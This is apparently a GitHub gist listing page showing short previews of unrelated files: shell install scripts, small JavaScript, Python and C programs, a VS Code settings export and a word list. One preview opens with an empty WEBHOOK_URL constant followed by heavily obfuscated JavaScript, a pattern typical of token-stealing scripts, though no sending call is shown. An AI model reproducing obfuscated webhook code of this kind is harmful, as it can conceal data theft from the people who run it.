This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
zsign_url="https://github.com/zhlynn/zsign.git" | |
clone_zsign() { | |
output=$(git clone "$zsign_url" zsign 2>&1) | |
lines=$(echo "$output" | wc -l) | |
count=0 | |
while IFS= read -r line; do |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# OpenSSL version to install | |
openssl_version="1.1.1t" | |
# OpenSSL source URL | |
openssl_url="https://www.openssl.org/source/openssl-$openssl_version.tar.gz" | |
# OpenSSL source tarball name | |
openssl_tar="openssl-$openssl_version.tar.gz" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
let displayType = 'flex'; | |
function switchPage(page) { | |
const pages = document.querySelectorAll('.page-container'); | |
for (let i = 0; i < pages.length; i++) { | |
if (pages[i].getAttribute('page') === page) { | |
pages[i].style.display = displayType; | |
} else { | |
pages[i].style.display = 'none'; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{"name":"Puffer","settings":"{\"settings\":\"{\\n \\\"workbench.colorTheme\\\": \\\"dark-blue\\\",\\n \\\"git.enableSmartCommit\\\": true,\\n \\\"git.confirmSync\\\": false,\\n \\\"editor.minimap.enabled\\\": false,\\n \\\"cSpell.userWords\\\": [\\n \\\"jailbreaking\\\",\\n \\\"reversepwn\\\"\\n ],\\n \\\"git.autofetch\\\": true,\\n \\\"security.workspace.trust.untrustedFiles\\\": \\\"open\\\",\\n \\\"explorer.confirmDelete\\\": false,\\n \\\"sshfs.configs\\\": [\\n {\\n \\\"name\\\": \\\"sideloadstore\\\",\\n \\\"host\\\": \\\"sideloadstore.me\\\",\\n \\\"username\\\": \\\"root\\\",\\n \\\"privateKeyPath\\\": \\\"/Users/kevin/ssh_key\\\",\\n \\\"label\\\": \\\"Sideload Store\\\",\\n \\\"passphrase\\\": true\\n }\\n ],\\n \\\"explorer.confirmDragAndDrop\\\": false,\\n \\\"[php]\\\": {\\n \\\"editor.defaultFormatter\\\": \\\"DEVSENSE.phptools-vscode\\\"\\n },\\n \\\" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function _0x39fc(_0x571c63,_0x147440){const _0x29bc64=_0x29bc();return _0x39fc=function(_0x39fc94,_0x4b7fcd){_0x39fc94=_0x39fc94-0x1ab;let _0xbdc15b=_0x29bc64[_0x39fc94];return _0xbdc15b;},_0x39fc(_0x571c63,_0x147440);}function _0x29bc(){const _0x44797d=['7689564BueOPm','88QaWbqT','left','2HuwQBo','1074kIUcLV','10602312nlJojb','innerText','bold','1760720zURmZz','4972070jAyYls','rgb(','random','color','2046546QoKwnf','style','createElement','1873889FOjpxX','fontSize','3icEkxs','40345axoaHv'];_0x29bc=function(){return _0x44797d;};return _0x29bc();}(function(_0x3aca4b,_0x97de79){const _0x16fbdd=_0x39fc,_0x41b70a=_0x3aca4b();while(!![]){try{const _0x94dba5=-parseInt(_0x16fbdd(0x1b7))/0x1(-parseInt(_0x16fbdd(0x1be))/0x2)+-parseInt(_0x16fbdd(0x1b9))/0x3(parseInt(_0x16fbdd(0x1bb))/0x4)+-parseInt(_0x16fbdd(0x1ba))/0x5(parseInt(_0x16fbdd(0x1ab))/0x6)+-parseInt(_0x16fbdd(0x1ac))/0x7+parseInt(_0x16fbdd(0x1af))/0x8+-parseInt(_0x16fbdd(0x1b4))/0x9+-parseInt(_0x16fbdd(0x1b0))/0xa(-parseInt(_0x16fbdd(0x1bc))/0xb);if(_0x94db |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import os | |
def help(): | |
print("Available commands:") | |
for command in commands: | |
print(" - " + command) | |
def clear(): | |
os.system('cls' if os.name == 'nt' else 'clear') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const WEBHOOK_URL = ""; | |
const _0x477e47 = _0x3e27; | |
(function(_0x578013, _0x1a4c44) { | |
const _0x2aff5e = _0x3e27, | |
_0x2899c5 = _0x578013(); | |
while (!![]) { | |
try { | |
const _0x293b74 = parseInt(_0x2aff5e(0x162)) / 0x1 + -parseInt(_0x2aff5e(0x170)) / 0x2 + -parseInt(_0x2aff5e(0x181)) / 0x3 * (parseInt(_0x2aff5e(0x185)) / 0x4) + -parseInt(_0x2aff5e(0x167)) / 0x5 + -parseInt(_0x2aff5e(0x174)) / 0x6 * (-parseInt(_0x2aff5e(0x16a)) / 0x7) + parseInt(_0x2aff5e(0x183)) / 0x8 * (-parseInt(_0x2aff5e(0x17e)) / 0x9) + parseInt(_0x2aff5e(0x184)) / 0xa; | |
if (_0x293b74 === _0x1a4c44) { |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
"pneumonoultramicroscopicsilicovolcanoconiosis", | |
"dichlorodiphenyltrichloroethane", | |
"trinitrophenylmethylnitramine", | |
"cyclotrimethylenetrinitramine", | |
"hydroxydehydrocorticosterone", | |
"antidisestablishmentarianism", | |
"hydroxydesoxycorticosterone", | |
"electroencephalographically", | |
"microspectrophotometrically", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
tokens = ["+", "-", "/", "*", "^"] | |
def parse(source): | |
characters = list(source) | |
final = [] | |
for char in characters: | |
if char.isdigit(): | |
final.append(float(char)) | |
else: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <time.h> | |
#define MAX 100 | |
#define MIN 0 | |
#define HIT 1 | |
#define ANSI_BOLD "\033[1m" | |
#define ANSI_RESET "\033[0m" |
OlderNewer